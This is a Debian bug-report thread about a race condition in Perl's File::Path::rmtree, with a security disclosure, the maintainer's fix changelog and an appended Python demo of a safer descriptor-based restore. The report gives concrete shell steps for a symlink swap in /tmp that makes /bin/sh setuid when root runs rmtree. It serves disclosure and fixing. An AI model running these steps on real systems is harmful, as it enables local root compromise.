Your message dated Mon, 07 Mar 2005 01:47:15 -0500 with message-id <[EMAIL PROTECTED]> and subject line Bug#286905: fixed in perl 5.8.4-7 has caused the attached Bug report to be marked as done.
This means that you claim that the problem has been dealt with. If this is not the case it is now your responsibility to reopen the Bug report if necessary, and/or fix the problem forthwith.

(NB: If you are a system administrator and have no idea what I am talking about this indicates a serious mail system misconfiguration somewhere. Please contact me immediately.)

Debian bug tracking system administrator
(administrator, Debian Bugs database)

--------------------------------------
From: Paul Szabo <[EMAIL PROTECTED]>
To: Debian Bug Tracking System <[EMAIL PROTECTED]>
Subject: perl-modules: File::Path::rmtree makes setuid
Date: Thu, 23 Dec 2004 09:10:31 +1100

Package: perl-modules
Version: 5.6.1-8.7
Severity: critical
File: /usr/share/perl/5.6.1/File/Path.pm
Tags: security
Justification: root security hole

Noting USN-44-1 e.g. in
http://archives.neohapsis.com/archives/fulldisclosure/2004-12/0385.html
I looked in perl-N.N.N/lib/File/Path.pm and noticed that rmtree contains a race condition, allowing creation of setuid files:

    (undef, undef, my $rp) = lstat $root or next;
    $rp &= 07777;   # don't forget setuid, setgid, sticky bits
    if ( -d _ ) {
    ...
        if (rmdir $root) {
            ++$count;
        }
        else {
            carp "Can't remove directory $root: $!";
            chmod($rp, ($Is_VMS ? VMS::Filespec::fileify($root) : $root))
                or carp("and can't restore permissions to "
                        . sprintf("0%o",$rp) . "\n");
        }
    }
    ...

Example of attack: suppose we know that root uses rmtree to clean up /tmp directories. Attacker prepares things:

    mkdir -p /tmp/psz/sh
    perl -e 'open F, ">/tmp/psz/sh/$_" foreach (1..1000)'
    chmod 4777 /tmp/psz/sh

While root is busy working on /tmp/psz/sh (and this can be made as slow as we like), attacker does:

    mv /tmp/psz/sh /tmp/psz/dummy
    ln -s /bin/sh /tmp/psz/sh

Root would have recorded the permissions of /tmp/psz/sh, but would "restore" it to /bin/sh.

I am not sure if things can almost be fixed (for those architectures without $force_writeable) by enclosing the chmod($rp,...) line within if(!safe|$force_writeable){...}.

Maybe it should be documented that rmtree must only be used if you can be sure to have exclusive access to the tree.

(A few minutes ago I emailed the File::Path authors [EMAIL PROTECTED] and [EMAIL PROTECTED]; Tim.Bunce bounced.)

Cheers,

Paul Szabo - [EMAIL PROTECTED] http://www.maths.usyd.edu.au:8000/u/psz/
School of Mathematics and Statistics University of Sydney 2006 Australia

-- System Information
Debian Release: 3.0
Architecture: i386
Kernel: Linux pisa.maths.usyd.edu.au 2.4.22-smssvr1.5.3 #1 SMP Wed Jun 23 13:01:39 EST 2004 i686
Locale: LANG=C, LC_CTYPE=C

Versions of packages perl-modules depends on:
ii  perl  5.6.1-8.7  Larry Wall's Practical Extraction

---------------------------------------
From: Brendan O'Dea <[EMAIL PROTECTED]>
To: [EMAIL PROTECTED]
Subject: Bug#286905: fixed in perl 5.8.4-7
Sender: Archive Administrator <[EMAIL PROTECTED]>
Date: Mon, 07 Mar 2005 01:47:15 -0500

Source: perl
Source-Version: 5.8.4-7

We believe that the bug you reported is fixed in the latest version of perl, which is due to be installed in the Debian FTP archive:

libcgi-fast-perl_5.8.4-7_all.deb to pool/main/p/perl/libcgi-fast-perl_5.8.4-7_all.deb
libperl-dev_5.8.4-7_i386.deb to pool/main/p/perl/libperl-dev_5.8.4-7_i386.deb
libperl-dev_5.8.4-7_powerpc.deb to pool/main/p/perl/libperl-dev_5.8.4-7_powerpc.deb
libperl-dev_5.8.4-7_sparc.deb to pool/main/p/perl/libperl-dev_5.8.4-7_sparc.deb
libperl5.8_5.8.4-7_i386.deb to pool/main/p/perl/libperl5.8_5.8.4-7_i386.deb
libperl5.8_5.8.4-7_powerpc.deb to pool/main/p/perl/libperl5.8_5.8.4-7_powerpc.deb
libperl5.8_5.8.4-7_sparc.deb to pool/main/p/perl/libperl5.8_5.8.4-7_sparc.deb
perl-base_5.8.4-7_i386.deb to pool/main/p/perl/perl-base_5.8.4-7_i386.deb
perl-base_5.8.4-7_powerpc.deb to pool/main/p/perl/perl-base_5.8.4-7_powerpc.deb
perl-base_5.8.4-7_sparc.deb to pool/main/p/perl/perl-base_5.8.4-7_sparc.deb
perl-debug_5.8.4-7_i386.deb to pool/main/p/perl/perl-debug_5.8.4-7_i386.deb
perl-debug_5.8.4-7_powerpc.deb to pool/main/p/perl/perl-debug_5.8.4-7_powerpc.deb
perl-debug_5.8.4-7_sparc.deb to pool/main/p/perl/perl-debug_5.8.4-7_sparc.deb
perl-doc_5.8.4-7_all.deb to pool/main/p/perl/perl-doc_5.8.4-7_all.deb
perl-modules_5.8.4-7_all.deb to pool/main/p/perl/perl-modules_5.8.4-7_all.deb
perl-suid_5.8.4-7_i386.deb to pool/main/p/perl/perl-suid_5.8.4-7_i386.deb
perl-suid_5.8.4-7_powerpc.deb to pool/main/p/perl/perl-suid_5.8.4-7_powerpc.deb
perl-suid_5.8.4-7_sparc.deb to pool/main/p/perl/perl-suid_5.8.4-7_sparc.deb
perl_5.8.4-7.diff.gz to pool/main/p/perl/perl_5.8.4-7.diff.gz
perl_5.8.4-7.dsc to pool/main/p/perl/perl_5.8.4-7.dsc
perl_5.8.4-7_i386.deb to pool/main/p/perl/perl_5.8.4-7_i386.deb
perl_5.8.4-7_powerpc.deb to pool/main/p/perl/perl_5.8.4-7_powerpc.deb
perl_5.8.4-7_sparc.deb to pool/main/p/perl/perl_5.8.4-7_sparc.deb

A summary of the changes between this version and the previous one is attached.

Thank you for reporting the bug, which will now be closed. If you have further comments please address them to [EMAIL PROTECTED], and the maintainer will reopen the bug report if appropriate.

Debian distribution maintenance software
pp.
Brendan O'Dea <[EMAIL PROTECTED]> (supplier of updated perl package)

(This message was generated automatically at their request; if you believe that there is a problem with it please contact the archive administrators by mailing [EMAIL PROTECTED])

Format: 1.7
Date: Mon, 7 Mar 2005 10:22:01 +1100
Source: perl
Binary: perl-base libcgi-fast-perl libperl-dev perl-debug perl-modules perl libperl5.8 perl-suid perl-doc
Architecture: all i386 powerpc source sparc
Version: 5.8.4-7
Distribution: unstable
Urgency: low
Maintainer: Brendan O'Dea <[EMAIL PROTECTED]>
Changed-By: Brendan O'Dea <[EMAIL PROTECTED]>
Description:
 libperl-dev - Perl library: development files
 libperl5.8 - Shared Perl library
 perl       - Larry Wall's Practical Extraction and Report Language
 perl-base  - The Pathologically Eclectic Rubbish Lister
 perl-debug - Debug-enabled Perl interpreter
 perl-suid  - Runs setuid Perl scripts
Closes: 178243 198855 250877 255919 256731 263325 275142 281091 281092 281437 286905 286922 289709
Changes:
 perl (5.8.4-7) unstable; urgency=low
 .
   * SECURITY [CAN-2005-0448]: rewrite File::Path::rmtree to avoid
     race condition which allows an attacker with write permission
     on directories in the tree being removed to make files setuid or
     to remove arbitrary files (closes: #286905, #286922). Supersedes
     the previous patch for CAN-2004-0452.
 .
   * Add PERL_DEBUGGING_MSTATS for debugperl (closes: #178243).
   * Escape dashes in verbatim text to have groff render them as-is
     rather than as \x{2010} (closes: #250877).
 .
   * CGI: handle escaped newlines in URLs (closes: #289709).
   * Net::NNTP: fix precedence error in article routine (closes: #275142).
   * Devel::Dprof: refer to executable as `perl' (closes: #198855).
   * Remove spurious undefined warning in getopts.pl (closes: #255919).
   * Remove XSI-isms from maintainer scripts (closes: #256731).
   * Revise MakeMaker patch to defer expansion of $(MANnEXT) until
     runtime (closes: #263325).
 .
   * Normalise case of a2p man page OPTIONS section, place optional
     filename in brackets (closes: #281091, #281092).
 .
   * Fix octal glitch in perlreref(1) (closes: #281437).
   * Have perl suggest both ReadLine variants (gnu, perl).
   * Upgrade suggestion on perl-doc to recommends now that dselect is
     less pedantic about the latter.
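
Added example (not part of the bug report and not the code of the Debian patch): the report's restore-by-name chmod next to a descriptor-based restore that reopens the directory with O_NOFOLLOW, compares the recorded device and inode, and only then calls fchmod. It is written in Python to exercise the POSIX calls directly; the function names and the scratch files standing in for /tmp/psz/sh and /bin/sh are constructed for the illustration.

```python
import os
import stat
import tempfile

def record(path):
    """lstat once, as rmtree does: keep identity and permission bits."""
    st = os.lstat(path)
    return st.st_dev, st.st_ino, stat.S_IMODE(st.st_mode)

def restore_by_path(path, rec):
    """Pattern from the report: chmod by name, which follows a symlink."""
    os.chmod(path, rec[2])

def restore_by_fd(path, rec):
    """Reopen without following symlinks, confirm identity, then fchmod."""
    dev, ino, mode = rec
    try:
        fd = os.open(path, os.O_RDONLY | os.O_DIRECTORY | os.O_NOFOLLOW)
    except OSError:
        return False  # now a symlink, not a directory, or gone
    try:
        st = os.fstat(fd)
        if (st.st_dev, st.st_ino) != (dev, ino):
            return False  # a different directory sits at this name
        os.fchmod(fd, mode)
        return True
    finally:
        os.close(fd)

def mode_after_swap(restore):
    """Replay the rename/symlink swap in a scratch tree (constructed data)
    and return the final mode of the file the symlink points at."""
    with tempfile.TemporaryDirectory() as top:
        victim = os.path.join(top, "victim")  # stands in for /bin/sh
        with open(victim, "w"):
            pass
        os.chmod(victim, 0o755)
        target = os.path.join(top, "sh")  # stands in for /tmp/psz/sh
        os.mkdir(target)
        os.chmod(target, 0o4777)
        rec = record(target)  # taken before the tree is walked
        os.rename(target, os.path.join(top, "dummy"))
        os.symlink(victim, target)
        restore(target, rec)  # the "restore permissions" step
        return stat.S_IMODE(os.stat(victim).st_mode)

if __name__ == "__main__":
    print(oct(mode_after_swap(restore_by_path)))
    print(oct(mode_after_swap(restore_by_fd)))
```

With the by-name restore the stand-in file ends up carrying the directory's recorded mode; with the descriptor-based restore it keeps its own.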